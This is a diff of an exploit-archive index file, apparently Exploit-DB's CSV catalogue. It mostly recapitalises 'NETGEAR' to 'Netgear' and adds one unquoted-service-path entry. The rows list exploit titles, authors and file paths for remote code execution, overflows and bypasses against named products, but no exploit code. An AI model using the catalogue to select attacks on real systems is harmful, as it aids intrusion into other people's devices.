8982,exploits/linux/dos/8982.txt,"Compface 1.5.2 - '.xbm' Local Buffer Overflow (PoC)",2009-06-17,metalhoney,dos,linux, @@ -2819,7 +2819,7 @@ id,file,description,date,author,type,platform,port 22401,exploits/windows/dos/22401.php,"Microsoft Internet Explorer 9 - Memory Corruption Crash (PoC)",2012-11-01,"Jean Pascal Pereira",dos,windows, 22402,exploits/windows/dos/22402.txt,"RealPlayer 15.0.6.14(.3g2) - 'WriteAV' Crash (PoC)",2012-11-01,coolkaveh,dos,windows, 22406,exploits/linux/dos/22406.txt,"Konqueror 4.7.3 - Memory Corruption",2012-11-01,"Tim Brown",dos,linux, -22407,exploits/hardware/dos/22407.txt,"NETGEAR ProSafe 1.x - VPN Firewall Web Interface Login Denial of Service",2003-03-21,"Paul Kurczaba",dos,hardware, +22407,exploits/hardware/dos/22407.txt,"Netgear ProSafe 1.x - VPN Firewall Web Interface Login Denial of Service",2003-03-21,"Paul Kurczaba",dos,hardware, 22415,exploits/hardware/dos/22415.c,"3Com SuperStack II RAS 1500 - IP Header Denial of Service",2003-03-24,"Piotr Chytla",dos,hardware, 22417,exploits/windows/dos/22417.py,"Kerio Personal Firewall 2.1.x - Remote Authentication Packet Buffer Overflow (1)",2003-04-28,"Core Security",dos,windows, 22419,exploits/php/dos/22419.php,"PHP 4.3 - 'socket_iovec_alloc()' Integer Overflow",2003-03-25,"Sir Mordred",dos,php, @@ -3560,7 +3560,7 @@ id,file,description,date,author,type,platform,port 27764,exploits/linux/dos/27764.txt,"LibTiff 3.x - TIFFFetchData Integer Overflow",2006-04-28,"Tavis Ormandy",dos,linux, 27765,exploits/linux/dos/27765.txt,"LibTiff 3.x - Double-Free Memory Corruption",2008-04-28,"Tavis Ormandy",dos,linux, 27856,exploits/linux/dos/27856.txt,"GNU BinUtils 2.1x - Buffer Overflow",2006-05-11,"Jesus Olmos Gonzalez",dos,linux, -27775,exploits/hardware/dos/27775.py,"NETGEAR ProSafe - Denial of Service",2013-08-22,"Juan J. Guelfo",dos,hardware, +27775,exploits/hardware/dos/27775.py,"Netgear ProSafe - Denial of Service",2013-08-22,"Juan J. Guelfo",dos,hardware, 27778,exploits/linux/dos/27778.txt,"Samba 3.5.22/3.6.17/4.0.8 - nttrans Reply Integer Overflow",2013-08-22,x90c,dos,linux,139 27790,exploits/osx/dos/27790.txt,"Apple Mac OSX 10.x - ImageIO OpenEXR Image File Remote Denial of Service",2006-05-01,Christian,dos,osx, 27791,exploits/linux/dos/27791.txt,"Xine 0.99.x - Filename Handling Remote Format String",2006-05-01,KaDaL-X,dos,linux, @@ -4110,7 +4110,7 @@ id,file,description,date,author,type,platform,port 32551,exploits/linux/dos/32551.txt,"Dovecot 1.1.x - Invalid Message Address Parsing Denial of Service",2008-10-30,anonymous,dos,linux, 32573,exploits/windows/dos/32573.txt,"Microsoft Windows Vista/2003 - 'UnhookWindowsHookEx' Local Denial of Service",2008-11-09,killprog.org,dos,windows, 32581,exploits/multiple/dos/32581.txt,"Zope 2.11.2 - PythonScript Multiple Remote Denial of Service Vulnerabilities",2008-11-12,"Marc-Andre Lemburg",dos,multiple, -32583,exploits/hardware/dos/32583.txt,"NETGEAR WGR614 - Administration Interface Remote Denial of Service",2008-11-13,sr.,dos,hardware, +32583,exploits/hardware/dos/32583.txt,"Netgear WGR614 - Administration Interface Remote Denial of Service",2008-11-13,sr.,dos,hardware, 32587,exploits/windows/dos/32587.txt,"VeryPDF PDFView - ActiveX Component Heap Buffer Overflow",2008-11-15,r0ut3r,dos,windows, 32596,exploits/multiple/dos/32596.txt,"GeSHi 1.0.x - XML Parsing Remote Denial of Service",2008-11-20,"Christian Hoffmann",dos,multiple, 32657,exploits/windows/dos/32657.py,"Nokia N70 and N73 - Malformed OBEX Name Header Remote Denial of Service",2008-12-12,NCNIPC,dos,windows, @@ -10046,7 +10046,7 @@ id,file,description,date,author,type,platform,port 40323,exploits/windows/local/40323.txt,"ZKTeco ZKAccess Professional 3.5.3 - Insecure File Permissions Privilege Escalation",2016-08-31,LiquidWorm,local,windows, 40330,exploits/windows/local/40330.py,"FortiClient SSLVPN 5.4 - Credentials Disclosure",2016-09-01,"Viktor Minin",local,windows, 40438,exploits/windows/local/40438.txt,"Glassfish Server - Unquoted Service Path Privilege Escalation",2016-09-28,s0nk3y,local,windows, -40442,exploits/windows/local/40442.txt,"NETGEAR Genie 2.4.32 - Unquoted Service Path Privilege Escalation",2016-09-30,Tulpa,local,windows, +40442,exploits/windows/local/40442.txt,"Netgear Genie 2.4.32 - Unquoted Service Path Privilege Escalation",2016-09-30,Tulpa,local,windows, 40443,exploits/windows/local/40443.txt,"Microsoft Windows Firewall Control - Unquoted Service Path Privilege Escalation",2016-10-03,zaeek,local,windows, 40450,exploits/linux/local/40450.txt,"Apache Tomcat 8/7/6 (Debian-Based Distros) - Local Privilege Escalation",2016-10-03,"Dawid Golunski",local,linux, 40451,exploits/windows_x86-64/local/40451.rb,"Street Fighter 5 - 'Capcom.sys' Kernel Execution (Metasploit)",2016-10-03,"OJ Reeves",local,windows_x86-64, @@ -11075,7 +11075,7 @@ id,file,description,date,author,type,platform,port 48397,exploits/windows/local/48397.txt,"Internet Download Manager 6.37.11.1 - Stack Buffer Overflow (PoC)",2020-04-29,Vulnerability-Lab,local,windows, 48398,exploits/windows/local/48398.txt,"EmEditor 19.8 - Insecure File Permissions",2020-04-29,SajjadBnd,local,windows, 48400,exploits/windows/local/48400.txt,"Druva inSync Windows Client 6.5.2 - Local Privilege Escalation",2020-04-29,"Chris Lyne",local,windows, -48414,exploits/windows/local/48414.txt,"Outline Service 1.3.3 - 'Outline Service ' Unquoted Service Path",2020-05-04,"Minh Tuan",local,windows, +48414,exploits/windows/local/48414.txt,"Outline Service 1.3.3 - 'Outline Service ' Unquoted Service Path",2020-05-04,"Minh Tuan",local,windows, 48415,exploits/windows/local/48415.py,"Frigate 3.36 - Buffer Overflow (SEH)",2020-05-04,"Xenofon Vassilakopoulos",local,windows, 48418,exploits/windows/local/48418.txt,"Oracle Database 11g Release 2 - 'OracleDBConsoleorcl' Unquoted Service Path",2020-05-05,"Nguyen Khang",local,windows, 48448,exploits/windows/local/48448.txt,"SolarWinds MSP PME Cache Service 1.1.14 - Insecure File Permissions",2020-05-11,"Jens Regel",local,windows, @@ -11094,6 +11094,7 @@ id,file,description,date,author,type,platform,port 48570,exploits/windows/local/48570.py,"10-Strike Bandwidth Monitor 3.9 - Buffer Overflow (SEH_DEP_ASLR)",2020-06-10,boku,local,windows, 48573,exploits/windows/local/48573.txt,"WinGate 9.4.1.5998 - Insecure Folder Permissions",2020-06-10,hyp3rlinx,local,windows, 48579,exploits/windows/local/48579.py,"Frigate Professional 3.36.0.9 - 'Find Computer' Local Buffer Overflow (SEH) (PoC)",2020-06-11,"Paras Bhatia",local,windows, +48591,exploits/windows/local/48591.txt,"Bandwidth Monitor 3.9 - 'Svc10StrikeBandMontitor' Unquoted Service Path",2020-06-16,boku,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -12180,7 +12181,7 @@ id,file,description,date,author,type,platform,port 7630,exploits/windows/remote/7630.html,"Megacubo 5.0.7 - 'mega://' Arbitrary File Download and Execute",2009-01-01,JJunior,remote,windows, 7701,exploits/linux/remote/7701.txt,"Samba < 3.0.20 - Remote Heap Overflow",2009-01-08,zuc,remote,linux,445 7706,exploits/windows/remote/7706.mrc,"Anope IRC Services With bs_fantasy_ext 1.2.0-RC1 - mIRC script",2009-01-08,Phil,remote,windows, -7712,exploits/hardware/remote/7712.txt,"NETGEAR WG102 - Leaks SNMP Write Password With Read Access",2009-01-09,"Harm S.I. Vaittes",remote,hardware, +7712,exploits/hardware/remote/7712.txt,"Netgear WG102 - Leaks SNMP Write Password With Read Access",2009-01-09,"Harm S.I. Vaittes",remote,hardware, 7739,exploits/windows/remote/7739.html,"ExcelOCX ActiveX 3.2 - Download File Insecure Method",2009-01-12,"Alfons Luja",remote,windows, 7747,exploits/windows/remote/7747.html,"Word Viewer OCX 3.2 - ActiveX 'Save' Remote File Overwrite",2009-01-13,Houssamix,remote,windows, 7748,exploits/windows/remote/7748.html,"Office Viewer ActiveX Control 3.0.1 - 'Save' Remote File Overwrite",2009-01-13,Houssamix,remote,windows, @@ -12319,7 +12320,7 @@ id,file,description,date,author,type,platform,port 8930,exploits/windows/remote/8930.txt,"ModSecurity 2.5.9 (Core Rules 2.5-1.6.1) - Filter Bypass",2009-06-11,"Lavakumar Kuppan",remote,windows, 8934,exploits/windows/remote/8934.py,"Apple iTunes 8.1.1.10 (Windows) - 'itms/itcp' Remote Buffer Overflow",2009-06-12,ryujin,remote,windows, 8938,exploits/windows/remote/8938.txt,"Green Dam 3.17 (Windows XP SP2) - 'URL' Remote Buffer Overflow",2009-06-12,seer[N.N.U],remote,windows, -8963,exploits/hardware/remote/8963.txt,"NETGEAR DG632 Router - Authentication Bypass",2009-06-15,"Tom Neaves",remote,hardware, +8963,exploits/hardware/remote/8963.txt,"Netgear DG632 Router - Authentication Bypass",2009-06-15,"Tom Neaves",remote,hardware, 8969,exploits/windows/remote/8969.rb,"Green Dam 3.17 - URL Processing Buffer Overflow (Metasploit)",2009-06-16,Trancer,remote,windows, 8970,exploits/windows/remote/8970.txt,"McAfee 3.6.0.608 - 'naPolicyManager.dll' ActiveX Arbitrary Data Write",2009-06-16,callAX,remote,windows, 8986,exploits/windows/remote/8986.txt,"Edraw PDF Viewer Component < 3.2.0.126 - ActiveX Insecure Method",2009-06-18,Jambalaya,remote,windows, @@ -12352,7 +12353,7 @@ id,file,description,date,author,type,platform,port 9456,exploits/hardware/remote/9456.txt,"ZTE ZXDSL 831 II Modem - Arbitrary Add Admin",2009-08-18,SuNHouSe2,remote,hardware, 9468,exploits/windows/remote/9468.py,"ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow (2)",2009-08-18,Wraith,remote,windows,69 9473,exploits/hardware/remote/9473.txt,"ZTE ZXDSL 831 II Modem - Arbitrary Configuration Access",2009-08-18,SuNHouSe2,remote,hardware, -9498,exploits/hardware/remote/9498.txt,"NETGEAR WNR2000 FW 1.2.0.8 - Information Disclosure",2009-08-24,"Jean Trolleur",remote,hardware, +9498,exploits/hardware/remote/9498.txt,"Netgear WNR2000 FW 1.2.0.8 - Information Disclosure",2009-08-24,"Jean Trolleur",remote,hardware, 9500,exploits/windows/remote/9500.cpp,"NaviCOPA Web Server 3.01 - Remote Buffer Overflow",2009-08-24,SimO-s0fT,remote,windows, 9503,exploits/hardware/remote/9503.txt,"Huawei SmartAX MT880 - Multiple Cross-Site Request Forgery Vulnerabilities",2009-08-24,"Jerome Athias",remote,hardware, 9508,exploits/windows/remote/9508.rb,"ProFTP 2.9 - Welcome Message Remote Buffer Overflow (Metasploit)",2009-08-25,His0k4,remote,windows, @@ -12896,7 +12897,7 @@ id,file,description,date,author,type,platform,port 16383,exploits/windows/remote/16383.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_INITIALIZE_RF Buffer Overflow (Metasploit)",2010-11-30,Metasploit,remote,windows, 16384,exploits/windows/remote/16384.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_TXTEVENT Buffer Overflow (Metasploit)",2010-11-24,Metasploit,remote,windows, 16385,exploits/windows/remote/16385.rb,"DATAC RealWin SCADA Server - Remote Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, -16388,exploits/hardware/remote/16388.rb,"NETGEAR WG111v2 Wireless Driver - Long Beacon Overflow (Metasploit)",2010-07-03,Metasploit,remote,hardware, +16388,exploits/hardware/remote/16388.rb,"Netgear WG111v2 Wireless Driver - Long Beacon Overflow (Metasploit)",2010-07-03,Metasploit,remote,hardware, 16389,exploits/windows/remote/16389.rb,"Omni-NFS Server - Remote Buffer Overflow (Metasploit)",2010-11-11,Metasploit,remote,windows, 16390,exploits/windows/remote/16390.rb,"Arugizer Trojan Horse (Energizer DUO) - Code Execution (Metasploit)",2010-09-20,Metasploit,remote,windows, 16391,exploits/windows/remote/16391.rb,"EMC AlphaStor Agent - Remote Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, @@ -14792,7 +14793,7 @@ id,file,description,date,author,type,platform,port 22224,exploits/multiple/remote/22224.txt,"Epic Games Unreal Engine 436 - URL Directory Traversal",2003-02-05,"Auriemma Luigi",remote,multiple, 22226,exploits/windows/remote/22226.txt,"Microsoft Internet Explorer 5 - ShowHelp Arbitrary Command Execution",2003-02-05,"Andreas Sandblad",remote,windows, 22229,exploits/windows/remote/22229.pl,"Celestial Software AbsoluteTelnet 2.0/2.11 - Title Bar Buffer Overflow",2003-02-06,"Knud Erik Hojgaard",remote,windows, -22236,exploits/hardware/remote/22236.txt,"NETGEAR FM114P Wireless Firewall - File Disclosure",2003-02-10,stickler,remote,hardware, +22236,exploits/hardware/remote/22236.txt,"Netgear FM114P Wireless Firewall - File Disclosure",2003-02-10,stickler,remote,hardware, 22244,exploits/hardware/remote/22244.txt,"Ericsson HM220dp DSL Modem - World Accessible Web Administration Interface",2003-02-11,"Davide Del Vecchio",remote,hardware, 22251,exploits/multiple/remote/22251.sh,"AIX 3.x/4.x / Windows 95/98/2000/NT 4.0 / SunOS 5 - 'gethostbyname()' Remote Buffer Overflow",2006-09-28,RoMaNSoFt,remote,multiple, 22264,exploits/linux/remote/22264.txt,"OpenSSL 0.9.x - CBC Error Information Leakage",2003-02-19,"Martin Vuagnoux",remote,linux, @@ -14848,9 +14849,9 @@ id,file,description,date,author,type,platform,port 22448,exploits/windows/remote/22448.txt,"BEA WebLogic 7.0 - Hostname/NetBIOS Name Remote Information Disclosure",2003-04-02,"Michael Hendrickx",remote,windows, 22449,exploits/unix/remote/22449.c,"Passlog Daemon 0.1 - 'SL_Parse' Remote Buffer Overflow (1)",2003-04-02,Xpl017Elz,remote,unix, 22450,exploits/unix/remote/22450.c,"Passlog Daemon 0.1 - 'SL_Parse' Remote Buffer Overflow (2)",2003-04-02,Xpl017Elz,remote,unix, -22453,exploits/hardware/remote/22453.txt,"NETGEAR FM114P ProSafe Wireless Router - UPnP Information Disclosure",2003-04-03,stickler,remote,hardware, +22453,exploits/hardware/remote/22453.txt,"Netgear FM114P ProSafe Wireless Router - UPnP Information Disclosure",2003-04-03,stickler,remote,hardware, 22454,exploits/linux/remote/22454.c,"AutomatedShops WebC 2.0/5.0 Script - Name Remote Buffer Overrun",2003-02-16,"Carl Livitt",remote,linux, -22455,exploits/hardware/remote/22455.txt,"NETGEAR FM114P ProSafe Wireless Router - Rule Bypass",2003-04-03,stickler,remote,hardware, +22455,exploits/hardware/remote/22455.txt,"Netgear FM114P ProSafe Wireless Router - Rule Bypass",2003-04-03,stickler,remote,hardware, 22462,exploits/multiple/remote/22462.txt,"Interbase 6.x - External Table File Verification",2003-04-05,"Kotala Zdenek",remote,multiple, 22466,exploits/windows/remote/22466.py,"BigAnt Server 2.52 SP5 - Remote Stack Overflow ROP-Based (SEH) (ASLR + DEP Bypass)",2012-11-04,"Lorenzo Cantoni",remote,windows, 22468,exploits/unix/remote/22468.c,"Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (1)",2003-04-11,Xpl017Elz,remote,unix, @@ -15302,7 +15303,7 @@ id,file,description,date,author,type,platform,port 24133,exploits/windows/remote/24133.rb,"freeSSHd 1.2.6 - Authentication Bypass (Metasploit)",2013-01-15,Metasploit,remote,windows, 24136,exploits/linux/remote/24136.txt,"KDE Konqueror 3.x - Embedded Image URI Obfuscation",2004-05-18,"Drew Copley",remote,linux, 24137,exploits/multiple/remote/24137.txt,"Netscape Navigator 7.1 - Embedded Image URI Obfuscation",2004-05-19,"Lyndon Durham",remote,multiple, -24140,exploits/hardware/remote/24140.txt,"NETGEAR RP114 3.26 - Content Filter Bypass",2004-05-24,"Marc Ruef",remote,hardware, +24140,exploits/hardware/remote/24140.txt,"Netgear RP114 3.26 - Content Filter Bypass",2004-05-24,"Marc Ruef",remote,hardware, 24148,exploits/multiple/remote/24148.txt,"Sun Java System Application Server 7.0/8.0 - Remote Installation Full Path Disclosure",2004-05-27,"Marc Schoenefeld",remote,multiple, 24149,exploits/php/remote/24149.php,"PHP 4/5 - Input/Output Wrapper Remote File Inclusion Function Command Execution",2004-05-27,Slythers,remote,php, 24187,exploits/windows/remote/24187.txt,"Microsoft Internet Explorer 6 - ADODB.Stream Object File Installation",2003-08-23,Jelmer,remote,windows, @@ -15469,7 +15470,7 @@ id,file,description,date,author,type,platform,port 24904,exploits/windows/remote/24904.rb,"Java CMM - Remote Code Execution (Metasploit)",2013-03-29,Metasploit,remote,windows, 24905,exploits/multiple/remote/24905.rb,"v0pCr3w (Web Shell) - Remote Code Execution (Metasploit)",2013-03-29,Metasploit,remote,multiple, 24907,exploits/windows/remote/24907.txt,"McAfee Virtual Technician (MVT) 6.5.0.2101 - Insecure ActiveX Method",2013-03-29,"High-Tech Bridge SA",remote,windows, -24931,exploits/hardware/remote/24931.rb,"NETGEAR DGN1000B - 'setup.cgi' Remote Command Execution (Metasploit)",2013-04-08,Metasploit,remote,hardware, +24931,exploits/hardware/remote/24931.rb,"Netgear DGN1000B - 'setup.cgi' Remote Command Execution (Metasploit)",2013-04-08,Metasploit,remote,hardware, 24935,exploits/linux/remote/24935.rb,"MongoDB - nativeHelper.apply Remote Code Execution (Metasploit)",2013-04-08,Metasploit,remote,linux, 24936,exploits/hardware/remote/24936.rb,"Linksys E1500/E2500 - 'apply.cgi' Remote Command Injection (Metasploit)",2013-04-08,Metasploit,remote,hardware, 24937,exploits/linux/remote/24937.rb,"HP System Management - Anonymous Access Code Execution (Metasploit)",2013-04-08,Metasploit,remote,linux, @@ -15486,7 +15487,7 @@ id,file,description,date,author,type,platform,port 24961,exploits/windows/remote/24961.html,"FirePHP Firefox Plugin 0.7.1 - Remote Command Execution",2013-04-17,Wireghoul,remote,windows, 24963,exploits/multiple/remote/24963.rb,"SAP ConfigServlet - OS Command Execution (Metasploit)",2013-04-18,"Andras Kabai",remote,multiple,50000 25091,exploits/multiple/remote/25091.txt,"realnetworks realarcade 1.2.0.994 - Multiple Vulnerabilities",2005-02-08,"Luigi Auriemma",remote,multiple, -24974,exploits/hardware/remote/24974.rb,"NETGEAR DGN2200B - 'pppoe.cgi' Remote Command Execution (Metasploit)",2013-04-22,Metasploit,remote,hardware, +24974,exploits/hardware/remote/24974.rb,"Netgear DGN2200B - 'pppoe.cgi' Remote Command Execution (Metasploit)",2013-04-22,Metasploit,remote,hardware, 24976,exploits/multiple/remote/24976.rb,"Java Applet - Reflection Type Confusion Remote Code Execution (Metasploit)",2013-04-23,Metasploit,remote,multiple, 24979,exploits/multiple/remote/24979.txt,"XLReader 0.9 - Remote Client-Side Buffer Overflow",2004-12-16,"Kris Kubicki",remote,multiple, 24980,exploits/multiple/remote/24980.txt,"Yanf 0.4 - HTTP Response Buffer Overflow",2004-12-15,"Ariel Berkman",remote,multiple, @@ -15942,14 +15943,14 @@ id,file,description,date,author,type,platform,port 29035,exploits/windows/remote/29035.rb,"SikaBoom - Remote Buffer Overflow (Metasploit)",2013-10-18,Asesino04,remote,windows, 29045,exploits/windows/remote/29045.txt,"Selenium Web Server 1.0 - Cross-Site Scripting",2006-11-15,"Greg Linares",remote,windows, 29083,exploits/windows/remote/29083.txt,"Sage 1.3.x - IMG Element Input Validation",2006-09-08,"Kevin Kierznowski",remote,windows, -29096,exploits/windows/remote/29096.rb,"NETGEAR MA521 Wireless Driver 5.148.724 - 'Beacon Probe' Remote Buffer Overflow",2006-11-18,"Laurent Butti",remote,windows, +29096,exploits/windows/remote/29096.rb,"Netgear MA521 Wireless Driver 5.148.724 - 'Beacon Probe' Remote Buffer Overflow",2006-11-18,"Laurent Butti",remote,windows, 29127,exploits/hardware/remote/29127.rb,"D-Link DIR-605L - Captcha Handling Buffer Overflow (Metasploit)",2013-10-22,Metasploit,remote,hardware,80 29129,exploits/windows/remote/29129.rb,"Interactive Graphical SCADA System - Remote Command Injection (Metasploit)",2013-10-22,Metasploit,remote,windows,12397 29130,exploits/windows/remote/29130.rb,"HP Intelligent Management Center BIms UploadServlet - Directory Traversal (Metasploit)",2013-10-22,Metasploit,remote,windows,8080 29132,exploits/unix/remote/29132.rb,"WebTester 5.x - Command Execution (Metasploit)",2013-10-22,Metasploit,remote,unix,80 29160,exploits/linux/remote/29160.c,"GNU Tar 1.1x - 'GNUTYPE_NAMES' Directory Traversal",2006-11-21,"Teemu Salmela",remote,linux, 29146,exploits/windows/remote/29146.c,"Novell Client 4.91 - 'NWSPOOL.dll' Remote Buffer Overflow",2006-11-21,"Andres Tarasco Acuna",remote,windows, -29167,exploits/windows/remote/29167.rb,"NETGEAR WG311v1 Wireless Driver 2.3.1.10 - SSID Heap Buffer Overflow",2006-11-22,"Laurent Butti",remote,windows, +29167,exploits/windows/remote/29167.rb,"Netgear WG311v1 Wireless Driver 2.3.1.10 - SSID Heap Buffer Overflow",2006-11-22,"Laurent Butti",remote,windows, 29171,exploits/windows/remote/29171.txt,"Business Objects Crystal Reports XI Professional - File Handling Buffer Overflow",2006-11-23,LSsec.com,remote,windows, 29210,exploits/php/remote/29210.rb,"Open Flash Chart 2 - Arbitrary File Upload (Metasploit)",2013-10-26,Metasploit,remote,php,80 29273,exploits/hardware/remote/29273.pl,"Watchguard Firewall XTM 11.7.4u1 - Remote Buffer Overflow",2013-10-29,st3n,remote,hardware,8080 @@ -16034,7 +16035,7 @@ id,file,description,date,author,type,platform,port 29807,exploits/php/remote/29807.php,"PHP 5.1.6 - 'Imap_Mail_Compose()' Remote Buffer Overflow",2007-03-31,"Stefan Esser",remote,php, 29808,exploits/php/remote/29808.php,"PHP 5.1.6 - 'Msg_Receive()' Memory Allocation Integer Overflow",2007-03-31,"Stefan Esser",remote,php, 29814,exploits/windows/remote/29814.txt,"NextPage LivePublish 2.02 - 'LPEXT.dll' Cross-Site Scripting",2007-04-03,"Igor Monteiro Vieira",remote,windows, -29815,exploits/hardware/remote/29815.rb,"NETGEAR ReadyNAS - Perl Code Evaluation (Metasploit)",2013-11-25,Metasploit,remote,hardware,443 +29815,exploits/hardware/remote/29815.rb,"Netgear ReadyNAS - Perl Code Evaluation (Metasploit)",2013-11-25,Metasploit,remote,hardware,443 29820,exploits/multiple/remote/29820.html,"Firebug 1.03 - Rep.JS Script Code Injection",2007-03-06,"Thor Larholm",remote,multiple, 29952,exploits/windows/remote/29952.html,"Sienzo Digital Music Mentor - 'DSKernel2.dll' ActiveX Control Stack Buffer Overflow",2007-05-07,shinnai,remote,windows, 29840,exploits/windows/remote/29840.html,"Roxio CinePlayer 3.2 - 'SonicDVDDashVRNav.dll' ActiveX Control Remote Buffer Overflow",2007-04-11,"Carsten Eiram",remote,windows, @@ -16151,7 +16152,7 @@ id,file,description,date,author,type,platform,port 30645,exploits/windows/remote/30645.txt,"Microsoft Windows - URI Handler Command Execution",2007-10-05,"Billy Rios",remote,windows, 30650,exploits/hardware/remote/30650.txt,"Linksys SPA941 - 'SIP From' HTML Injection",2007-10-09,"Radu State",remote,hardware, 30652,exploits/hardware/remote/30652.txt,"Cisco IOS 12.3 - 'LPD' Remote Buffer Overflow",2007-10-10,"Andy Davis",remote,hardware, -30673,exploits/hardware/remote/30673.txt,"NETGEAR SSL312 PROSAFE SSL VPN-Concentrator 25 - Error Page Cross-Site Scripting",2007-10-15,SkyOut,remote,hardware, +30673,exploits/hardware/remote/30673.txt,"Netgear SSL312 PROSAFE SSL VPN-Concentrator 25 - Error Page Cross-Site Scripting",2007-10-15,SkyOut,remote,hardware, 30677,exploits/linux/remote/30677.pl,"Asterisk 'asterisk-addons' 1.2.7/1.4.3 - CDR_ADDON_MYSQL Module SQL Injection",2007-10-16,"Humberto J. Abdelnur",remote,linux, 30678,exploits/multiple/remote/30678.java,"Nortel Networks UNIStim IP SoftPhone 2050 - RTCP Port Buffer Overflow",2007-10-18,"Cyrill Brunschwiler",remote,multiple, 30692,exploits/windows/remote/30692.js,"RealPlayer 10.0/10.5/11 - 'ierpplug.dll' ActiveX Control Import Playlist Name Stack Buffer Overflow",2007-10-18,anonymous,remote,windows, @@ -16525,7 +16526,7 @@ id,file,description,date,author,type,platform,port 33164,exploits/multiple/remote/33164.txt,"WebKit - Floating Point Number Remote Buffer Overflow",2009-08-11,Apple,remote,multiple, 33165,exploits/hardware/remote/33165.txt,"2WIRE Routers - 'CD35_SETUP_01' Access Validation",2009-08-12,hkm,remote,hardware, 33172,exploits/windows/remote/33172.txt,"Valve Software Source Engine - Format String",2009-08-17,"Luigi Auriemma",remote,windows, -33177,exploits/hardware/remote/33177.txt,"NETGEAR WNR2000 - Multiple Information Disclosure Vulnerabilities",2009-08-18,"Jean Trolleur",remote,hardware, +33177,exploits/hardware/remote/33177.txt,"Netgear WNR2000 - Multiple Information Disclosure Vulnerabilities",2009-08-18,"Jean Trolleur",remote,hardware, 33192,exploits/multiple/remote/33192.php,"Google Chrome 6.0.472 - 'Math.Random()' Random Number Generation",2009-08-31,"Amit Klein",remote,multiple, 33203,exploits/multiple/remote/33203.txt,"GreenSQL Firewall 0.9.x - WHERE Clause Security Bypass",2009-09-02,"Johannes Dahse",remote,multiple, 33207,exploits/windows/remote/33207.txt,"SmartVMD 1.3 - ActiveX Control 'VideoMovementDetection.dll' Remote Buffer Overflow",2009-09-01,"optix hacker",remote,windows, @@ -16941,7 +16942,7 @@ id,file,description,date,author,type,platform,port 35806,exploits/windows/remote/35806.c,"Poison Ivy 2.3.2 - Remote Buffer Overflow",2011-05-27,"Kevin R.V",remote,windows, 35809,exploits/windows/remote/35809.c,"Microsoft Windows Live Messenger 14 - 'dwmapi.dll' DLL Loading Arbitrary Code Execution",2011-05-31,Kalashinkov3,remote,windows, 35810,exploits/linux/remote/35810.txt,"libxmlInvalid 2.7.x - XPath Multiple Memory Corruption Vulnerabilities",2011-05-31,"Chris Evans",remote,linux, -35817,exploits/hardware/remote/35817.txt,"NETGEAR WNDAP350 Wireless Access Point - Multiple Information Disclosure Vulnerabilities",2011-06-01,"Juerd Waalboer",remote,hardware, +35817,exploits/hardware/remote/35817.txt,"Netgear WNDAP350 Wireless Access Point - Multiple Information Disclosure Vulnerabilities",2011-06-01,"Juerd Waalboer",remote,hardware, 35818,exploits/multiple/remote/35818.txt,"Nagios 3.2.3 - 'expand' Cross-Site Scripting",2011-06-01,"Stefan Schurtz",remote,multiple, 35822,exploits/windows/remote/35822.html,"Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution",2015-01-19,"Praveen Darshanam",remote,windows, 35836,exploits/linux/remote/35836.pl,"Perl Data::FormValidator 4.66 Module - 'results()' Security Bypass",2011-06-08,dst,remote,linux, @@ -17326,7 +17327,7 @@ id,file,description,date,author,type,platform,port 39074,exploits/cgi/remote/39074.txt,"Seowon Intech WiMAX SWC-9100 Router - '/cgi-bin/diagnostic.cgi?ping_ipaddr' Remote Code Execution",2014-02-03,"Josue Rojas",remote,cgi, 39105,exploits/windows/remote/39105.py,"VideoCharge Studio - 'CHTTPResponse::GetHttpResponse()' Remote Stack Buffer Overflow",2014-02-19,"Julien Ahrens",remote,windows, 39104,exploits/multiple/remote/39104.py,"Dassault Systemes Catia - Remote Stack Buffer Overflow",2014-02-19,"Mohamed Shetta",remote,multiple, -39089,exploits/hardware/remote/39089.txt,"NETGEAR D6300B - '/diag.cgi?IPAddr4' Remote Command Execution",2014-02-05,"Marcel Mangold",remote,hardware, +39089,exploits/hardware/remote/39089.txt,"Netgear D6300B - '/diag.cgi?IPAddr4' Remote Command Execution",2014-02-05,"Marcel Mangold",remote,hardware, 39102,exploits/windows/remote/39102.py,"EasyCafe Server 2.2.14 - Remote File Read",2015-12-26,R-73eN,remote,windows, 39114,exploits/ios/remote/39114.txt,"Apple iOS 4.2.1 - 'facetime-audio://' Security Bypass",2014-03-10,"Guillaume Ross",remote,ios, 39115,exploits/multiple/remote/39115.py,"ET - Chat Password Reset Security Bypass",2014-03-09,IRH,remote,multiple, @@ -17361,7 +17362,7 @@ id,file,description,date,author,type,platform,port 39439,exploits/jsp/remote/39439.txt,"File Replication Pro 7.2.0 - Multiple Vulnerabilities",2016-02-11,"Vantage Point Security",remote,jsp, 39499,exploits/linux/remote/39499.txt,"Proxmox VE 3/4 - Insecure Hostname Checking Remote Command Execution",2016-02-26,Sysdream,remote,linux, 39514,exploits/php/remote/39514.rb,"ATutor 2.2.1 - SQL Injection / Remote Code Execution (Metasploit)",2016-03-01,Metasploit,remote,php,80 -39515,exploits/windows/remote/39515.rb,"NETGEAR NMS300 ProSafe Network Management System - Arbitrary File Upload (Metasploit)",2016-03-01,Metasploit,remote,windows,8080 +39515,exploits/windows/remote/39515.rb,"Netgear NMS300 ProSafe Network Management System - Arbitrary File Upload (Metasploit)",2016-03-01,Metasploit,remote,windows,8080 39522,exploits/hardware/remote/39522.txt,"Schneider Electric SBO / AS - Multiple Vulnerabilities",2016-03-03,"Karn Ganeshen",remote,hardware, 39554,exploits/php/remote/39554.rb,"PHP Utility Belt - Remote Code Execution (Metasploit)",2016-03-11,Metasploit,remote,php,80 39568,exploits/hardware/remote/39568.py,"Cisco UCS Manager 2.1(1b) - Remote Command Injection (Shellshock)",2016-03-16,thatchriseckert,remote,hardware,443 @@ -17490,8 +17491,8 @@ id,file,description,date,author,type,platform,port 